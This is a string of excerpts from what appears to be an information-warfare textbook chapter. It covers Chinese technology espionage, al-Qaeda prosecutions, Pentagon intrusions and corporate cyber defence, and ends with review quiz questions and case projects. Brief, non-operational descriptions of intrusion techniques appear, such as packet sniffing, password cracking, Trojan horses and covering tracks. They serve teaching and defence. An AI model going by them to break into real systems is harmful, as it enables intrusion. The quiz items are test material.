Furthermore, as the recent North Korean and Iranian missile tests demonstrated yet again, a third world country whose leadership is determined to advance
its capabilities will not be deterred by nonproliferation regimes
...
Stolen Thunder Tools
Like a neutron bomb (whose design Chinese agents allegedly stole), the Cox report demolished any doubt that China engages in espionage against the United States (see sidebar, “China Grabs U.S. Technology to Modernize Its Military”), but it left standing a whole array of big questions and small mysteries
...
The deal might have gone through if not for a small hitch: the manufacturer recalled that the men, using a different company name, had tried earlier to get a U.S. license to export the gyroscopes to China—and had been turned down
...
Yi has pleaded not guilty; his coconspirator,
Collin Shu, a Canadian, was also arrested and pleaded not guilty
...
The
gyroscopes are generally used for guiding missiles or maneuvering fighter jets
...
INTENSE DEBATE
The gyroscope case is one of the latest incidents illuminating Beijing’s voracious appetite for high-end U.S. technology that has military capabilities
...
A report by a panel chaired by Rep
...
), in 1999, suggested that China may have married U.S. computer technology with nuclear weapons designs it stole in the 1980s from U.S. labs
...
Proponents of the sale of high-tech goods to China say they help open the country to influences like American television shows beamed off U.S.-manufactured satellites
...
The present and past administrations have generally supported this view, but in
1999, in a surprising turnaround, Clinton advisers blocked California satellite maker
Hughes Electronics Corp
...
Various officials offered different explanations for the decision, but the government told Hughes the launches could transfer too much militarily significant
know-how
...
Pentagon officials counter that nobody is assessing the impact of the fiber-optic lines, electronic-switching gear, computers, and satellites pouring into China
...
In March 1996, as Beijing was threatening Taiwan with missiles, the State and
Defense departments approved the export to China of two satellite receiving stations
worth $7
...
The recipient, documents show, was China Electronic Systems
Engineering Company, part of China’s military
...
The National Security Agency
signed off on the deal, but congressional critics say the sale deserves a second look
...
Experts point out that the Chinese can evade U.S. export controls by harnessing together less powerful machines—or buying high-capacity machines on a Russian Internet site
...
The
Cox report calls for greater scrutiny, including spot checks in China to ensure the
best machines are used only for civilian purposes
...
Experts say China’s rapidly modernizing military is still years from catching up
with the United States, at best, but some worry that China will put high-tech imports
to their best military uses and turn into a surprising adversary
...
Why would China’s spy masters tip their hand? Maybe they bungled, giving away too much in an effort to plant a double agent
...
The release of the bipartisan Cox report in 1999 certainly did that
...
For two decades, it says, China has used spies, front companies, and scientific exchanges to filch some of America’s most precious secrets, but on closer reading, it is still unclear how much damage has been done to U.S. national security
...
Democrats on the congressional panel, which was led by Republican Rep
...
There are, unfortunately, a number of places where the
report reaches to make a point and, frankly, exaggerates
...
It’s possible, as Cox and some Pentagon officials
argue, that the sum of China’s technological thievery is even larger than its parts
...
The CIA discovered this in 1995 when a Chinese “walk-in” (an agent who came forward voluntarily) handed over a Chinese document stamped “secret”
...
One was the size of the “package” containing the nuclear device, whose yield (explosive power) was already available from open sources
...
It’s more like
looking at a car’s engine compartment and knowing how much horsepower the
block can produce
...
The Chinese document, dated 1988, also described the size and yield of four other U.S. warheads, but that may have come from publicly available sources
...
Most experts think that its goal is to ensure China’s “second-strike capability”—the ability to retaliate for a nuclear attack, not to launch a first strike
...
The first of the new missiles, the DF-31, won’t be able to reach most of the territory of the United States, but could it intimidate China’s neighbors or make the
United States hesitate to defend Taiwan in a crisis? Definitely
...
The report says the two companies ignored restrictions on
technology transfers and gave away sensitive information while helping China investigate a series of failed attempts to launch the firms’ satellites into space
...
How to compensate for the violent winds that buffet rockets in flight
...
How to better investigate failed launches
...
Still, it is unclear how quickly China will be able to make those improvements
...
The spying and technology transfer is of enormous concern, but having it in your hand doesn’t mean you know how to use it or effectively deploy it
...
The question is
what it does with them
...
The Cox report says they have
been used in nuclear weapons applications, such as modeling hypothetical explosions rather than conducting real ones after Beijing signed the Comprehensive Test
Ban Treaty in 1996
...
Radar
The Cox report also asserts that classified U.S. radar research stolen by the People’s Republic of China could be used to threaten U.S. submarines, but the White House produced a letter from the Navy to the Justice Department stating, “It is difficult to make a case that significant damage has occurred from the alleged disclosure”
...
One possible explanation for
Beijing’s disclosure of its own espionage is that Chinese leaders wanted the world to
know they could build a large, modern arsenal—if they wanted to
...
If that was the plan, it just might have worked
...
For example, investigators at Los Alamos National Laboratory, in 2000, discovered that computer hard drives containing nuclear weapons data and other
highly sensitive material stored in a vault at the laboratory had disappeared, according to several United States Government officials
...
Officials reported that the hard drives were missing on June 1, 2000,
after officials went to search for them following forest fires in the area
...
The material, stored in the vault of the laboratory’s X Division, where nuclear
weapons are designed, contained what officials described as nuclear weapons data
used by the government’s Nuclear Emergency Search Team, or NEST, which responds to nuclear accidents and nuclear-related threats from terrorists
...
In addition, the missing material included intelligence information concerning the Russian nuclear weapons program
...
Habiger, conducted an intensive search and investigation at Los Alamos but did not find the
data
...
Officials said they remained uncertain whether the
data has been misplaced or stolen
...
As previously mentioned, Dr
...
Dr
...
Dr
...
The discovery of Dr
...
Congress later passed legislation creating a new nuclear weapons agency within the
Energy Department to oversee Los Alamos and the nation’s other nuclear weapons
laboratories
...
Lee
was dismissed
...
The officials are said to have assumed that the material was in use somewhere in the lab
by Los Alamos scientists
...
The hard drives were eventually found near a trash-can
...
In mid-1998, the CIA,
working with Albania’s intelligence service, had rolled up a terrorist cell guided by
wanted dead or alive Saudi exile Osama bin Laden
...
The Middle Eastern plotters were sent home to face prosecution
...
The United States has yet to nail all of those responsible for the Cole attack
(even though a few suspects have been detained), but that first guess made a
macabre sort of sense to those waging the interminable war against terrorism
...
This war is waged largely in the shadows, a cat-and-mouse contest between terrorists and intelligence agencies that only rarely comes into public view
...
Fragmentary bits of data gleaned from eavesdropping satellites, human
informers, friendly governments, and old-fashioned police work are pieced together to deter and disrupt terrorist attacks on a regular basis
...
The posts went on high alert, and the aircraft carrier USS Truman was diverted from Naples to Crete
...
The war comes out of the shadows when U.S. intelligence and law enforcement agents lose a battle, such as in the Cole attack or the 1998 bombings of two U.S. embassies in East Africa (see sidebar, “Putting Terror Inc
...
As traumatic as they
are, though, for each such loss there is many an unheralded success—dashing terrorists’ hopes of more bloodied bodies and battered buildings on the world’s TV screens
...
ON TRIAL
Ali Mohamed is a man of many faces: Egyptian intelligence agent, U.S. Army paratrooper, FBI informant, and aide to wanted dead or alive terrorist mastermind Osama bin Laden
...
Bin Laden looked at the picture of the American Embassy and
pointed to where a truck could go as a suicide bomber
...
A sweeping 319-count indictment charges bin
Laden and 20 others with a terrorist crime spree dating back to 1991
...
The attacks include not only those on the U.S. embassies in 1998 (which left over 220 dead and 5,000 injured), but also attacks on U.S. troops in Somalia and Saudi Arabia
...
INFIDELS
The October 2000 suicide bombing of the USS Cole and the 9-11 attacks (tied by
investigators to bin Laden’s network) have added fresh urgency to the government’s
efforts to thwart the wanted dead or alive Saudi exile, now hiding in the badlands of
Afghanistan or nearby in Pakistan
...
The indictment imparts an image of a paranoid, virulently anti-American network determined to purge Muslim lands of “infidels”
...
Proving a grand conspiracy may be difficult
...
Through electronic eavesdropping, for example, U.S. officials quickly learned of bin Laden’s involvement in the embassy blasts, but they are loath to introduce such sensitive records into court
...
Prosecutors tie bin Laden to the conspiracy largely through his
funding of al-Qaeda and his calls for holy war against the West
...
For others, it is their work in
bin Laden’s businesses in Sudan, from construction and agriculture to an investment
house, which prosecutors call fronts for terror
...
With his guilty plea, Mohamed has made the prosecution’s job far easier
...
He strongly hinted he could connect the dots to the five others in custody, who have all pleaded not guilty
...
Al-Owali, a Saudi Arabian, allegedly filmed
a statement before the bombing celebrating his “martyrdom,” and rode in the pickup
carrying the Nairobi bomb; he was found later in a hospital with keys to the truck’s
padlock nearby
...
A third defendant, Saddiq Odeh, a Jordanian, is allegedly tied to TNT and detonators used in Tanzania
...
His case was recently severed from the
others after he stabbed a prison guard in the eye
...
A tire
store manager in Arlington, Texas, he acted, prosecutors contend, as a bag man and
passport fixer while working as bin Laden’s personal secretary
...
Mohamed, a former U.S. Army sergeant, a naturalized American citizen born in Egypt, claims he worked with el-Hage in Nairobi and that during a visit to el-Hage’s house, bin Laden’s security chief told him to conduct surveillance on American, British, French, and Israeli “targets” in Senegal
...
Mohamed’s guilty
plea has thrown a wrench into their strategies
...
If Ali Mohamed does
indeed take the stand, his credibility will likely come under fire
...
El-Hage, a naturalized U.S. citizen, certainly seems to be feeling the pressure
...
The plea, offered without consulting with prosecutors, was thrown out because el-Hage told the judge he was acting not out of guilt, but because he wanted to escape the humiliation of a trial
...
Court documents place the 43-year-old el-Hage within a rogues’ gallery of terrorists
...
Further revelations may come from Ali Mohamed, who is cooperating with the
FBI
...
Al-Qaeda and its allies received explosives
training at Hezbollah camps in Lebanon, Mohamed claimed, and received bombs
disguised to look like rocks from the Iranians
...
Iran
is an untold story in this
...
Ties to the USS Cole bombing may well emerge from trial testimony, and a further indictment in New York (this one under seal) names even
more alleged bin Laden conspirators
...
In November 2000, for instance, authorities in Kuwait, who thought they
had radical Islamists under control, got a nasty shock
...
A suspect, Mohammed al-Dosary, led investigators to a desert weapons cache that held 293
pounds of high explosives, 1,450 detonators, and, for good measure, 5 hand
grenades
...
Even more worrisome, the plotters had helpers in Kuwait’s government, one of the closest U.S. allies in the Persian Gulf
...
Bin Laden has tapped into what U.S. officials sardonically call the “Afghan Veterans Association,” Arabs who answered the call to holy war against the Soviets two decades ago—at the time, with backing from the CIA
...
That case
sounded the first broad alarms that thousands of Arab veterans from the Afghan
war had now trained their sights on the West
...
Bin Laden finances and motivates a “network of networks,” co-opting homegrown terrorist groups, from Egyptian Islamic Jihad to the Abu Sayyaf group in the Philippines
to the Islamic Movement of Uzbekistan
...
The
United States government was slow to recognize what bin Laden was doing
...
Without fanfare, Washington in 1999 opened a new front in the war
...
U.S. intelligence agencies routinely tip off local security services to problems they didn’t even know they had
...
In Albania, Algeria, Pakistan, Syria, and elsewhere, bin Laden devotees have
been booted out, often on immigration charges and with little publicity
...
The war on terror is fought down
in the weeds
...
It’s the slow, dirty, grunt police work that goes
on every day
...
CIA operatives in
more than 60 countries pressured, pleaded, and paid local authorities to crack
down on Islamic radicals
...
This cost the agency
a great deal of money and resources
...
Bin Laden and his organization, al-Qaeda, are still itching to pull off an attack in pro-Western Jordan, and though U.S. and Kenyan authorities busted up an al-Qaeda operation in Nairobi in early 1998, the victory was only temporary
...
They were able to use the infrastructure that was in place, spin up a new cell, and go after the target
...
Just as sobering is what officials call the “mujahideen underground railroad,” a
vast effort to move young recruits to terrorist training camps in Afghanistan
...
Using professionally
forged documents and Hotmail Internet accounts to keep in touch, network members move people through Italy, the Balkans, Turkey, and Dubai
...
Inside, the only sign of Islamic activism is a hand-made sign protesting Russia’s war in Muslim Chechnya, but U.S., British, and Yemeni officials say the mosque is a recruitment station for terror camps and that its fundamentalist imam, Abu Hamza al-Masri, has ties with terror groups abroad
...
While some of the funds may go to legitimate Islamic
charity work, bin Laden receives a steady stream from mosques, charities, and
schools
...
That’s what he’s done
...
Despite the nature of the quarry, progress is being made in the war on terrorism
...
There’s a chance that the
United States is even gaining ground, but not very much
...
Jordanian officials alerted U.S. agencies to the millennium threat
...
This is a dramatic turnaround
...
Through eavesdropping and, increasingly, informants, Western spy agencies
are gaining a clearer picture of the structure of bin Laden’s network and his inner
circle, but penetrating the distinct cultures in which the terrorists operate is difficult
...
One advantage: the terrorist networks’ decentralized structure
...
The CIA is more aggressive but is hampered
by 1995 regulations restricting recruitment of sources with unsavory backgrounds
...
Nor have the terror fighters been able to get bin Laden himself, who still moves between homes, residences, and underground bunkers in Afghanistan or in neighboring
Pakistan
...
One is provided by his dwindling Taliban hosts, and his own personal security detail
includes an elder son who is said to rarely leave his side but now is presumed dead
...
The terrorists do their own spying
...
The Cole attackers slipped through a small window (four hours every other month) as U.S. ships refueled in Yemen
...
Sometimes, terrorists dispatch walk-ins, “informers” who proffer false information to U.S. agents
...
When that fact became public, he switched to a system of mule
messengers and code words
...
When Khalil Deek was arrested in Pakistan in December 1999, U.S. and Jordanian officials weren’t sure how much of the millennium plot they’d unraveled
...
U.S. agents rushed the computer to the Fort Meade, Maryland, campus of the code-breaking National Security Agency
...
The National Security Agency had to
know whether Deek had operational information such as where and how the attacks were planned
...
Fighting terrorism is like being a soccer goalie
...
THE IW GAMES
The number of cyberattacks and intrusions into Pentagon computer networks in
2004 is expected to top off at 68,000, an increase of 9% from 2003, according to the
DoD
...
Ninety-nine percent of the successful attacks and intrusions can be attributed to known vulnerabilities and security gaps that have gone unfixed and poor security practices by defense agencies
...
Hackers stung the Pentagon at least 66,366 times in 2003 and 58,493 times in 2002
...
By exposing and highlighting vulnerabilities, the attacks can actually help inoculate the system for times of crisis—but only if the appropriate lessons are learned now
...
The Pentagon is currently operating in a relatively benign international environment, yet it was hard pressed to deal with the detected hacks
...
In addition to weak security practices by DoD network administrators, the increase in the number of attacks can be attributed to the greater availability of sophisticated hacker tools on the Internet
...
The increase in the number and the sophistication of the attacks poses a significant threat to DoD plans to use computer networks as part of its overall strategy to fight future conflicts, a concept known throughout the Pentagon as “network-centric warfare”
...
However, sophisticated encryption devices designed by the
National Security Agency protect the classified networks
...
Regardless of classification, there are connections and the Pentagon is dependent on that infrastructure
...
Due to legal and privacy [5] restrictions, the department is prohibited from pursuing hackers beyond its networks
...
The agency doesn’t go outside of their firewalls, but they’d like to
...
Pentagon criminal investigators are searching for a legal framework that would enable them to use one search warrant to track hackers back through the multitude of Web sites they often use as launching pads for their attacks
...
How Other Countries Are Getting into the IW Games
According to the CIA, other countries are developing cyberattack capability
...
Not only
do they have to guard against Love Bug worms and security holes in Microsoft Outlook, but also they’ve got to worry about Fidel Castro hacking into their computers
...
Castro’s armed forces
could initiate an IW or computer network attack that could disrupt the military
...
There’s certainly
the potential for Cuba to employ those kinds of tactics against the United States’
modern and superior military
...
In addition to Cuba, terrorists such as Osama bin Laden are now using the
Internet and encryption to cloak communications within their organizations
...
They send their operational
planning and judgments using encryption
...
Bin Laden allegedly uses encryption (and a variant of the technology, called steganography) to evade U.S. efforts to monitor his organization
...
And what about Castro? It might seem odd to view a country best known for
starving livestock, Elian Gonzalez, and acute toilet paper shortages as a looming
threat, but the Pentagon seems entirely serious
...
They have a strong intelligence apparatus, good security, and the potential to disrupt the U.S. military through asymmetric tactics
...
The CIA is detecting, with increasing frequency, the appearance of doctrine and dedicated offensive cyberwarfare programs in other countries
...
IW is becoming a viable strategic alternative for countries that realize that, in
conventional military confrontation with the United States, they will not prevail
...
The United States can make the enemy’s command centers ineffective by
changing their data system
...
The enemy’s banking system
and even its entire social order can also be dominated
...
These countries perceive that cyberattacks, launched from
within or outside the United States, represent the kind of asymmetric option they
will need to level the playing field during an armed crisis against the United States
...
The technology to launch cyberattacks is already well known
...
Both the Chinese and Russians have expressed interest in some form of international effort to place curbs on such attacks
...
Organizations such as Interpol have the structure in place to facilitate the sharing of IW data between countries, but a common basis of legislation, policy, and procedures is still needed
...
They attack American
interests and citizens abroad because of the wealth of opportunities, the symbolic
value, and the exposure from the world’s most extensive news media
...
The Air Force has also been called on to counter the IW arsenal and tactics of terrorists and rogues, as it did in striking targets in Afghanistan and Sudan after the August 1998 bombing of U.S. embassies in Kenya and Tanzania
...
Others point to “cyberterror,” weapons of mass destruction, or other alarming
scenarios
...
Although this is not an issue for the Air Force alone, this chapter recommended a number of specific steps that could better prepare the U.S. military and private companies to confront “the new terrorism” and its IW arsenal and tactics, as follows
...
The PAF team found that changing technologies and tactics accompany equally
important changes in the motives and structure of terrorism itself
...
Although the number of
incidents worldwide declined during the 1990s, the number of fatalities rose
...
Some terrorists believe that ever
more spectacular and lethal acts are necessary to capture public attention
...
During the 1980s, for example, Czechoslovakia reportedly sold over 40,000
tons of Semtex, a plastic explosive, to countries sponsoring international terrorism
...
With bomb-making and other information now widely available, the number
of “amateur” participants has increased
...
A final trend is perhaps the most striking: the rise of religiously motivated terrorism has brought increased lethality
...
This began to change in the 1980s,
and since then a significant share of terrorist groups has been motivated at least
partly by religion
...
In 1996, for example, the year of the Khobar Towers attack, religiously motivated terror accounted for 10 of the 13 extremely violent and high-profile acts
that took place worldwide
...
Mainstream ethnic, separatist, and ideological groups will deviate little from established patterns
...
The sophistication of their weapons will be in their simplicity: clever adaptation of technology and materials that are easy to obtain and difficult to trace
...
New entities with systemic, religious, or apocalyptic motivations and greater access to weapons of mass destruction may present a new
and deadlier threat
...
Amateurs, in particular, who may be exploited or manipulated by professional
terrorists or covert sponsors, may be willing to use these weapons
...
The most striking development here is not attacks on America’s information
infrastructure
...
This
change, enabled by the information revolution, makes detecting, preventing,
and responding to terrorist activity more difficult than ever before
...
Future terrorism may often feature information disruption rather than physical destruction
...
Terrorists will continue using advanced information technology to support
these organizational structures
...
This is likely to make terrorism harder to fight
...
There are examples across the conflict spectrum, including the failings of governments to
defeat transnational criminal cartels engaged in drug smuggling and narcoterrorism, as in Colombia
...
Arrests in the United States just before New Year’s Eve 1999 suggest the ability
of such networks to operate across regions
...
Conventional counterterrorism techniques may not work well against such
groups
...
Implications for the Air Force: how can the United States respond to more
lethal, more diverse, and increasingly privatized patterns of terrorism?
An Agenda for Action
The United States needs to formulate a clear, realistic, and realizable national strategy that can evolve with the changing terrorist threat
...
This strategy
leads to key implications for the use of air- and space-based assets
...
Air and space power will be critical elements in defending U.S. interests—including U.S. Air Force forces—against this evolving threat
...
With the preceding in mind, when completing the Information Warfare Arsenal and Tactics of Terrorist and Rogues Checklist (Table F15
...
The order is not significant; however, these are
the activities for which the researcher would want to provide a detailed description
of procedures, review, and assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
Few countries have programs to develop cyberattack technologies and
could develop such capabilities over the next decade and beyond
...
The U.S., Russia, China, France, and Israel are developing cyberarsenals
and the means to wage all-out cyberwarfare
...
Terrorist groups are developing weapons of mass destruction
...
Russia has become a breeding ground for computer hackers
...
S
...
E
...
2
...
Shut down Halliburton
B
...
Shut down the transportation system
D
...
Cause links to globalization to break down
3
...
Information attacks
B
...
State sponsors
D
...
The PAF team found that changing technologies and tactics accompany equally
important changes in:
A
...
Unneeded capabilities
C
...
Ongoing analysis and research efforts
E
...
Terrorists have also become more adept at killing, with deadlier weapons made
more easily available through alliances with:
A
...
Organized crime
C
...
Rogue states and private sponsors
E
...
The subject got into the network
and placed several large media files on several computers and changed the desktop
configurations
...
How did the CFS go about conducting the investigation?
HANDS-ON PROJECTS
A local lumber company went up in flames in late September
...
A CFS team
(CFST) received three backup tapes and the hard drive from the system
...
The plaintiff
claimed that if there were no responsive emails for 10/04–12/04, it was either because there were no responsive emails from that date or because they did not exist
on the accessible backup tapes
...
Prior to leaving the format imaging firm to form his own digital imaging company with his
codefendant, the defendant emailed the format imaging firm’s customer database
to his home computer in an attempt to steal intellectual property
...
How was the CFS able to go
about conducting the email and database recovery?
REFERENCES
[1] Vacca, John R
...
[2] Vacca, John R
...
[3] Vacca, John R
...
, Charles River Media, Hingham, MA, 1999
...
Rumsfeld, Chairman, Dr
...
Blechman, General Lee Butler, USAF (Ret
...
Richard L
...
William R
...
William Schneider, Jr
...
Welch, USAF (Ret
...
Paul D
...
James Woolsey and appointed by the Director of Central Intelligence], (http://www
...
gov/hasc/testimony/105thcongress/BMThreat
...
[5] Vacca, John R
...
16 The Information Warfare Arsenal and Tactics of Private Companies
Although the military establishment has put in place certain safeguards against
information warfare (IW) attacks, the state of preparation of private companies is way behind
...
In addition to the private sector having its own interests in reducing vulnerability in
cyberspace, the integration of military and private sector interests in the information revolution demands it
...
Unscrupulous
companies have always been delighted to take advantage of new opportunities to
sabotage or steal from a dangerous competitor
...
In addition to industrial espionage activities, internal moles or disaffected employees may destroy information networks, and outside groups such as
political activists can also cause significant damage
...
Private corporations are just as dependent on the infrastructures that form the
basis for modern economy—such as telephony, computer networks, electric power,
energy and transportation networks—as are military organizations
...
Often the electronic version is held in preference to and in the absence
of paper records
...
Infrastructure activities: Physical and functional infrastructures are increasingly being controlled by electronics and software rather than mechanical or
electrical means
...
In addition, the distinctions between warfare, crimes, and accidents are increasingly
blurred yet all may have the same damaging results
...
Programs are available free of charge on the Internet to crack passwords or grab key
strokes to recognize them, and there is commercially available software to exploit
network file system applications that allow file sharing
...
A
user or a system may be disabled by “bombing” it with identical and repeated messages and attached files
...
Because of the nature of the competitive market, various programs may be released
without proper assessment or testing, which may leave exploitable gaps
...
Large numbers of highly trained and professional scientists and computer experts may no longer have jobs
...
The Information Warfare Arsenal and Tactics of Private Companies
471
Some estimates claim that 73% of the Russian economy is under the control of
criminal enterprises
...
Estimates claim that 89% of Russian banks are under criminal control
...
Russian organized crime has been identified, in particular, in the following
transnational areas: money laundering, drug trafficking, and commercial fraud
...
Although it holds much sway in Russia, ROC has yet to reach a truly transnational existence
...
Here a problem arises: if a terrorist organization has an identifiable and compassing ideology (or proto-strategy), such an
ideology would be general in nature
...
The artificial and superficial equilibrium imposed by the Cold War has been destroyed, and ROC and FSU instability need to be added to the countries that
have always used terrorism as a form of diplomacy and an adjunct to their foreign
policies
...
New and dangerous players have emerged in the international arena
...
Whether it be the multinational corporation or a terrorist group that
targets it, both share a common characteristic
...
All these factors have accelerated the erosion of the monopoly of the coercive
power of the state as the disintegration of the old order accelerates
...
These enterprises include everything
from arms traders to drug cartels, which will provide and use existing and new
weapons in terrorist campaigns as a part of their pursued profit and political power
...
They move
in what has been called the “gray areas,” those regions where crime control has
shifted from legitimate governments to new half political, half criminal powers
...
Each will seek out new and profitable
targets through terrorism in an international order that is already under assault
...
This rejection is by no means complete (both corporations and terrorists exist at a substate level to some degree)
...
Although some might argue that multinational corporations and terrorist
groups stand at either end of a spectrum, the spectrum would still be that of a
movement away from “state-centrism” and the concentration of coercive power
in the state—with the danger that they each move so far away from one another
and that they meet up again
...
Such an ambivalence (and an appreciation of the vulnerability of a
corporation) would be brought to the fore, were a corporation to hire the same
cyberterrorists to undermine its competitors
...
In addition, the multinational
corporation, through its simultaneous existence on many planes of definition,
can at any time be seen to be on a similar plane with a substate or non-state
actor, as well as being on a nation-state plane—thus attracting criticism and violence that would have been directed toward the identifiably “official” organs of
the nation-state in previous times
...
At this point, activities may then move to rural or less protected areas
...
A failure to
strengthen and protect a particular part of that operation may cause incalculable
damage to a multinational corporation’s network should a weak network node be
attacked and disabled
...
This section will also briefly cover some discrete
problems that may be encountered in applying traditional forms of risk treatment
to what is essentially a new form of risk, and it will then discuss the possible need
for a new or revised approach to the risk-management system of a corporation in
light of the new form of threat represented by computer terrorism
...
The three elements of IPK are
Open source intelligence
Information technology
Electronic security and counterintelligence
Interestingly, IPK must rely almost entirely on the private sector for sources
and services, which will require the development of a new national intelligence and security approach to take into account what has hitherto been an area in which the private sector has not participated
...
This is known as the
enmeshing phenomenon
...
Common to all aspects of information operations (IPK, IW, and all source intelligence) is open source intelligence
...
Along with this
must go an increasing identification of the private sector with the defense establishment, both in its own perception and in the perception of outsiders
...
It may
also be futile
...
Defensive Tactics to Thwart the Threat of Business Spies
Threats to the security of business information are numerous and they come from
all directions, including organized crime syndicates, terrorists, and government-sponsored espionage, and most global high-technology companies have little idea
of the array of hostile forces targeted against them
...
Some of the threats might be obvious, as well as the strategies that companies
can mount against them, but others might not be so cut and dried
...
Government-sponsored intelligence operations against companies seek information about bids on contracts, information that affects the price of commodities, financial data, and banking information
...
To get this sensitive information, government intelligence services
use many of the techniques developed during the Cold War
...
In addition, government intelligence services are known to
plant moles in companies and steal or surreptitiously download files from unsecured computers
...
Messages that are not
encrypted with the latest technology are especially vulnerable
...
Though the French intelligence service is probably the most egregious offender,
it is far from alone
...
The United States, however, is not among them
...
What the U.S. intelligence community (CIA, NSA, etc
...
Reports originating in Europe, especially France, that the United States is using
signals intelligence capabilities as part of a program called “Echelon” to attack European companies for the economic advantage of U.S. companies are simply not true
...
The result of this history
is that the reservoir of professionally trained intelligence mercenaries is growing
...
Some of these groups are looking for the
greatest amount of destruction, and an attack on the critical information infrastructure of the United States would satisfy that goal
...
Vulnerabilities that all the different types of attackers exploit
include open systems, plug-and-play systems, centralized remote maintenance of
systems, remote dial-in, and weak encryption
...
Companies should review security measures in sensitive areas of their operations such as research and development, talk to traveling executives who carry
company laptops about using precautions to prevent theft, and examine communications with overseas facilities with an eye toward installing commercially available encryption that is all but impossible to crack
...
Company executives should also limit physical access to sensitive data and programs and regularly change computer passwords
...
A basic rule is to take time to identify company-critical information, whether it
is technology, a production technique, basic research and development, financial information, or marketing strategy, and take steps to protect it
...
These are measures that make good business sense even if you are not a target of a government intelligence service, a competitor, a criminal organization, a terrorist, or a hacker
...
Nevertheless, the government and private firms must work together to bolster cybersecurity
...
Other sectors, including telecommunications, transportation,
and waterways, face difficult challenges stemming from a vast array of factors such
as deregulation and market fluctuations
...
There are
some sectors that are ahead of others
...
Obstacles
The information technology (IT) sector has been moving very aggressively
...
Corporate concerns regarding shareholder value and increased competition
may be getting in the way of security progress at some banks, airlines, and telecommunications companies
...
8 billion scam against Citigroup Inc
...
Likewise, the airline and telecommunications sectors have come “under siege”
as a result of deregulation and the current climate of mergers and acquisitions
...
Security protections against cyberattacks in natural gas and electric industries
are being addressed constantly, although the national effort lacks a useful gauge of
how much security is enough
...
SURVIVING OFFENSIVE RUINOUS IW
The principal actors in any cyberterrorist attack on a corporation, and the levels on
which the attack may be made have already been discussed
...
The U.S. General Accounting Office (GAO) has produced a report on information security and computer attacks at the Department of Defense
...
As the sendmail program scans the message for its
address, you will execute the attacker’s code
...
Computer-searching programs: Password cracking and theft is much easier
with powerful computer-searching programs that can match numbers or alphanumeric passwords to a program in a limited amount of time
...
Packet sniffing: An attacker inserts a software program at a remote network or
host computer that monitors information packets sent through the system and
reconstructs the first 125 keystrokes in the connection
...
This
could enable the attacker to obtain the password of a legitimate user and gain
access to the system
...
Trojan horses: An independent program that when called by an authorized
user performs a useful function but also performs unauthorized functions,
which may usurp the user’s privileges
...
It is becoming increasingly difficult for “low-knowledge” attackers to use relatively cheap, “high-sophistication” attack tools to gain access to what was, historically, a relatively impregnable system
...
Surviving a Misbehaving Enemy
Article 99 of the Uniform Code of Military Justice defines misbehavior in the face
of the enemy as any person who, before or in the presence of the enemy:
Runs away
Shamefully abandons, surrenders, or delivers up any command, unit, place, or
military property that it is his or her duty to defend
Through disobedience, neglect, or intentional misconduct endangers the safety
of any such command, unit, place, or military property
Casts away his arms or ammunition
Is guilty of cowardly conduct
Quits his place of duty to plunder or pillage
Causes false alarms in any command, unit, or place under control of the armed
forces
Willfully fails to do his utmost to encounter, engage, capture, or destroy any
enemy troops, combatants, vessels, aircraft, or other thing, which it is his or her
duty to encounter, engage, capture, or destroy
Does not afford all practical relief and assistance to any troops, combatants, vessels, or aircraft of the armed forces belonging to the United States or their allies when engaged in battle
Shall be punished by death or such punishment, as a court-martial shall direct
Now, you’re wondering what this has to do with network security, IW, or yourself—because you are not at war
...
Every day, someone from a subculture other than your own is waging a battle
against you and your systems
...
You are guilty of misbehavior in front of the enemy by not admitting your own fallibility, by not passing critical information to your own team, and
by your sheer arrogance in thinking that you can’t be bested by some punk kid
...
True, it is not life or death, and
hacked systems aren’t really your enemy, but the concept is the same
...
Open communication is your enemy’s greatest advantage and your greatest weakness
...
In the race to improve security infrastructures faster than hackers can invent methods to penetrate
firewalls [1], it is important to ascertain a user’s identity before permitting access to
protected data
...
New technologies that aim to directly strengthen user authentication include
the use of tokens and smart cards combined with digital certificates
...
Recently, biometrics technology has rapidly pushed through barriers that have
slowed its adoption in mainstream environments
...
The remaining challenge for biometrics is to address the requirements for large-scale
deployments in complex governmental, institutional, and commercial systems
...
A multitiered authentication
system built around these notions is one solution
...
Applications
and transaction systems request a centralized authentication server to confirm or
deny a user’s identity
...
The policy system might maintain extensive rules to meet security requirements that may differ depending on the user, application, or transaction task
...
Thus,
the validation system must be able to layer biometrics approaches, balance matching scores from each matching process, and interpret these results in light of preset
policies
...
It’s critical that companies scale
with system demand
...
The user-interaction tier collects credentials from live users in real time
...
Many types of point-of-service access devices, such as desktops
and laptop computers, mobile phones [2], wireless pocket devices [3], and airport
kiosks, may be used at any time by end users
...
Therefore, the authentication server must dynamically determine what biometric to request, based
on the client device
...
Repositories of this information may be centralized
in protected databases or decentralized within personal tokens or smart cards
...
Although there are advantages to using biometrics, authentication should not
forego other methods as part of the overall authentication solution
...
Other security technologies, such as
public key infrastructure, also perform critical roles in an overall security model
...
Some forms of disruption
will lead merely to nuisance and economic loss, but other forms will jeopardize
lives
...
Stopping DoS Attacks Together
The most recent round of denial-of-service (DoS) attacks shows that cyberterrorism is alive and well, and that e-businesses and their service providers aren’t doing
enough to stop it
...
After the recent attack on
Microsoft shut off access to everything from Expedia to Hotmail, the company attributed the problem to one employee’s misconfiguration of a router, yet experts
noted that a failure to distribute domain name service (DNS) servers made the
company vulnerable to begin with
...
ISPs are starting to tackle the subject of
network-wide security, but they’re doing it by laying out requirements for their
corporate customers
...
It’s high
time ISPs and their clients started sharing information about what works (and
doesn’t work) in terms of network architecture, data access, and security systems
...
They should give serious thought to
the latest security tools that can stop DoS attacks at their routers
...
Everyone along the e-business food chain has something to lose when a DoS
attack succeeds
...
The ISP loses customer confidence and significant resources in combating the attack
...
ISPs must communicate the types of attacks they’re experiencing
...
With so much at risk, it’s hard to imagine why these
conversations haven’t been taking place all along
...
Glitches in air-traffic-controller screens cause a deadly
mid-air collision above Chicago’s O’Hare Airport, killing over 456 people in both
planes, and over 1,500 people on the ground when the planes plunge into a nearby
crowded shopping center
...
Then in October, a high-power microwave burst fries the electronics at an ebola virus lab research building at Fort Detrick (Frederick, Maryland)
...
The theory goes that if a well-funded, organized series of cyberattacks were
to strike at a target’s economic and structural nerve centers, it would send the target society into chaos and make it difficult for the military to communicate and
move troops
...
Profile target: Invader gets passwords, then identifies machines and software
running on the network
...
Cover tracks: Invader hides the evidence trail and slips away
...
The weak areas are in predicting when someone is gathering information for a
